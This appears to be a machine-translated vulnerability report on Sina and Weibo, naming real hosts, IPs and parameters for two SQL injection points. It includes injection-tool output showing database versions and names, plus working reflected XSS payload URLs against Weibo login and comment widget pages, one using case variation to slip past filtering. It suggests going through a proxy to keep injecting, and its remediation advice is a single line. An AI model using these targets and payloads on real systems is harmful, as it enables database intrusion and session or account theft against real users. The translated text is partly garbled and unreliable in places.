Sina injection and Weibo xss

However, injection requires a small number of conditions...
Two injections: one is blind, and one can execute some query commands.
 
Injection Site 1:
Http://sme.sina.com.hk/cgi-bin/nw/main.cgi? Cat= 7806
Ip: 218.213.85.141

Injection Site 2:
Http://house.sina.com.hk/cgi-bin/nw/main.cgi? Id = 7
Ip: 218.213.85.179

Condition:
I don't know if it is a domain name resolution problem or why. Sometimes domestic ip addresses cannot access these domain names or ip addresses.
But if the proxy goes out, you can continue to inject --!

Domain Name 1:
Http://sme.sina.com.hk/cgi-bin/nw/main.cgi? Cat= 7806

Host IP: 218.213.85.141
Keyword Found :? T? X ???????? C ????
Injection type is Integer
DB Server: MySQL> = 4.1
Selected Column Count is 1
Valid String Column is 1
Current DB: sme

Domain name 2: mysql blind note

Host IP: 218.213.85.179
Keyword Found: iPhone
Injection type is Integer
DB Server: MySQL> = 4.1
Trying another method using keyword for finding columns count
Findig columns count for MySQL failed!
Testing for MySQL error based injection method
MySQL error based injection method cant be used!
Trying blind method
Finding current data base
Length of 'current db' is 5
Current DB: house

Site 1 can be select @ version-> 4.1.22-log

Site 2: mysql blind Injection

 



Author upload


Xss:

1.

Address:
Http://weibo.com/login.php? Url = http://club.weibo.com & entry = daren "> <script> alert (/By + FeiFei/) </script>




Solution:
This... you have handled a lot...

Encode or escape parameters submitted by the user.

Http://weibo.com/callmefeifei for powder.

Address 1:
Http://open.weibo.com/widget/comments.php

The problem lies in the manual url configuration, and the filtering is not rigorous enough.

Address 2:
Http://widget.weibo.com/distribution/comments.php? Language = zh_cn & appkey = 1 & url = http: // feifei ']);' </script> <ScRipt> alert (/By + FeiFei/) </ScRipt>

 

After reading this, it's OK ~~